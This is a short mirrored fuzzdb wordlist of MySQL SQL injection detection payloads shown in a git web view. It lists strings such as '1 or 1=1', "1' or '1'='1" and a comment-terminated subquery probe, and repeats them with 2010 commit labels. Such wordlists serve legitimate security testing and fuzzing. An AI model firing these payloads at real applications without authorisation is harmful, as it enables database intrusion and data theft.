fuzzdb/attack-payloads/sql-injection/detect/MySQL.fuzz.txt

mirror of https://github.com/fuzzdb-project/fuzzdb.git synced 2024-12-11 19:52:26 +00:00
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
sqli 2010-04-22 19:18:50 +00:00			`1'1`
			`1 exec sp_ (or exec xp_)`
			`1 and 1=1`
			`1' and 1=(select count(*) from tablenames); --`
fixed 2010-08-04 13:49:46 +00:00			`1 or 1=1`
			`1' or '1'='1`